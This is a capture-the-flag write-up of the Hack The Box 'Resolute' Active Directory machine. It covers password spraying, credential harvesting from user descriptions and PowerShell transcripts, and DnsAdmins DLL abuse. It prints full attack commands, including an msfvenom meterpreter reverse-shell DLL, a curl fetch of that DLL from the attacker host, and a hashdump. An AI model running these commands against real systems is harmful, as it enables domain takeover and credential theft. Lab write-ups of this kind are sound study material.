HTB - Resolute
Machine Info
Resolute is a medium difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command-line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT_AUTHORITY\SYSTEM.
Enumeration
Scope
IP Address: 10.10.10.169
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-11 02:24:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-11T02:24:32
|_ start_date: 2024-07-11T02:18:59
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h27m07s, deviation: 4h02m31s, median: 7m06s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2024-07-10T19:24:30-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required* Open ports: 53,88,135,139,389,445,5985
* UDP Open ports: 53,88,123,389
* Services: DNS - KERBEROS - LDAP - RPC - SMB - winRM
* Versions: Windows Server 2016 Standard 14393
* Important Notes: Domain: megabank.local - - FQDN: Resolute.megabank.localDNS Enumeration
Zone transfer failed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ dig axfr MEGABANK.LOCAL @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr MEGABANK.LOCAL @10.10.10.169
;; global options: +cmd
; Transfer failed.RPC Enumeration
I got a username list from rpcclient and filtered them.
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ cat users.test | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst
<snip>
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
<snip>SMB Enumeration
I didn't get anything as anonymous login failed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\:
SMB 10.10.10.169 445 RESOLUTE [-] Error enumerating shares: STATUS_ACCESS_DENIEDI also try password spraying with the same usernames as passwords but failed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u users.lst -p users.lst --no-bruteforce --continue-on-success
<snip>
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:sunita STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:abigail STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:marcus STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:sally STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:fred STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:angela STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:felicia <snip>KERBEROS Enumeration
I tried ASREP-Roasting attack but no thing
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ impacket-GetNPUsers megabank.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
<snip>
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>Initial Access
When I run out all the options I know to get a foothold, I decided to query the users info I got from rpccclient, maybe a password exists in description field or something
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ for rid in $(cat rid.lst); do rpcclient -U "%" $ip -c "queryuser $rid" | tee -a rpc.output;done
<snip>
User Name : marko
Full Name : Marko Novak
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Account created. Password set to Welcome123!
Workstations:
Comment :
Remote Dial :
<snip>we found the password Welcome123!, Let's confirm access with user marko
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u marko -p 'Welcome123!'
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILUREIt seems like this password doesn't belong to him, So I will spray it to the list of users we have
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec smb $ip -u users.lst -p 'Welcome123!' --continue-on-success
<sinp>
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
<snip>So, we have now valid credentials melanie:Welcome123!, Let's see if we have remote access to that box
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec winrm $ip -u melanie -p 'Welcome123!'
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)Yes, we have :)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ evil-winrm -i $ip -u melanie -p 'Welcome123!'
*Evil-WinRM* PS C:\Users\melanie\Documents> type ..\Desktop\user.txt
f65ae23b0313053bb9xxxxxxxxxxxxxxxxUser Flag: f65ae23b0313053bb9xxxxxxxxxxxxxxxx
Privilege Escalation
When I landed on windows box joined to Active Directory, I run bloodhound.py to collect info about the domain and provide it to bloodhound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ bloodhound-python -u 'melanie' -p 'Welcome123!' -ns $ip -d megabank.local -c all
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 28 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MS02.megabank.local
INFO: Querying computer: Resolute.megabank.local
INFO: Done in 00M 20SStart neo4j database and then run bloodhound to open GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ sudo neo4j start
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ bloodhound provide the data collected as zip file to bloodhound
user ryan has a profile on the box, Let's enumerate him in bloodhound
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryanClick on unrolled group membership to see nested group membership
ryanis a member ofDNSADMINSgroup via nested group membership, So If I could takeover this account, the path toDomain Adminsis clear
I found no database, PowerShell history file, no stored credentials or scripts located somewhere however, I learned a trick before that I always make on windows machine which is looking for hidden files as I do in Linux
*Evil-WinRM* PS C:\> ls -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 7/10/2024 7:18 PM 402653184 pagefile.sysPSTranscripts is not a standard directory, Let's explore it
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\20191203
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txtThat .txt file looks very interesting, Let's see
*Evil-WinRM* PS C:\> type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
<snip>
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
<snip>Let's check if these credential are valid
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ crackmapexec winrm $ip -u ryan -p 'Serv3r4Admin4cc123!'
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)And successfully got the ryan account.
we can then abuse our membership in
DNS Adminsgroup, we can alter the.dllofdnsservice running asSYSTEMto add ourselves inDomain Adminsgroup or get a reverse shell asSYSTEM
Before we start the attack, Let's first confirm we have control on dns service
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe sdshow DNS
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)The object SID that has control of dns service is S-1-5-21-1392959593-3013219662-3596683436-1105 I look at bloodhound to get the SID of user ryan and see if the two SIDs match each other
So, we have control of DNS service, Let's start the attack.
Generate malicious dll to add ryan to domain admins
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=8443 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dllupload the malicious dll to the box via winrm
*Evil-WinRM* PS C:\Users\ryan\Documents> upload shell.dll
Info: Upload successful!Load our dll
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\shell.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.Start meterpreter listener
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8443
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8443 Stop and start dns service to get the dll executed
sc.exe stop dns
sc.exe start dnsMy exploit failed for some reason but after few moments, I realized that there was a script that revert everything and delete my payload, So I created a one-linear command to get my payload executed before it was deleted
*Evil-WinRM* PS C:\Users\ryan\Documents> curl 10.10.16.3/shell.dll -o shell.dll; dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\shell.dll; sc.exe stop dns; sc.exe start dnsmsf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8443
[*] Sending stage (201798 bytes) to 10.10.10.169
[*] Meterpreter session 2 opened (10.10.16.3:8443 -> 10.10.10.169:53631) at 2024-07-10 23:40:39 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMmeterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fb3b106896cdaa8axxxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:49a9276d51927d3cd34a8ac69ae39c40:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ryan:1105:aad3b435b51404eeaad3b435b51404ee:3f653cb103e005246bc95ceb2f56e30b:::
marko:1111:aad3b435b51404eeaad3b435b51404ee:8276510304cefe6e77c3a9e910ba3a6a:::
sunita:6601:aad3b435b51404eeaad3b435b51404ee:4e67de165ebd5e604d6580b15cfc61b2:::
abigail:6602:aad3b435b51404eeaad3b435b51404ee:3f67ccb851b02ac4ee9f91eeddf1cac7:::
<snip>meterpreter > shell
Process 2592 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator
C:\Users\Administrator>type Desktop\root.txt
2ef8121d16eb0fabebxxxxxxxxxxxxxxxxRoot Flag: 2ef8121d16eb0fabebxxxxxxxxxxxxxxxx
Reverst.ps1
This the script which was preventing us as it does the following:
Reset
ryan,melanieandadministratorpasswordReset
dnssettings
We can see the plaintext password of administrator
PS C:\Users\Administrator> type Documents\revert.ps1
type Documents\revert.ps1
$users = Get-Content C:\Users\Administrator\Documents\users.txt
Stop-Process -Name "dns" -Force
Stop-Service -Name "dns" -Force
reg delete HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters /v ServerLevelPluginDll /f
Start-Service -Name "dns"
$groups = Get-ADPrincipalGroupMembership -Identity ryan | where {$_.Name -ne "Contractors"}
Remove-ADPrincipalGroupMembership -Identity ryan -MemberOf $groups -Confirm:$false
Set-ADAccountPassword -Identity ryan -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Serv3r4Admin4cc123!" -Force)
$groups = Get-ADPrincipalGroupMembership -Identity melanie | where {$_.Name -ne "Remote Management Users"}
Remove-ADPrincipalGroupMembership -Identity melanie -MemberOf $groups -Confirm:$false
Set-ADAccountPassword -Identity melanie -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Welcome123!" -Force)
Set-ADAccountPassword -Identity administrator -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "DontH4ckxxxxxxxx" -Force)Access the machine as admin with plaintext password.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ evil-winrm -i $ip -u administrator -p 'DontH4ckxxxxxxxxxxx'
*Evil-WinRM* PS C:\Users\Administrator\Documents> Last updated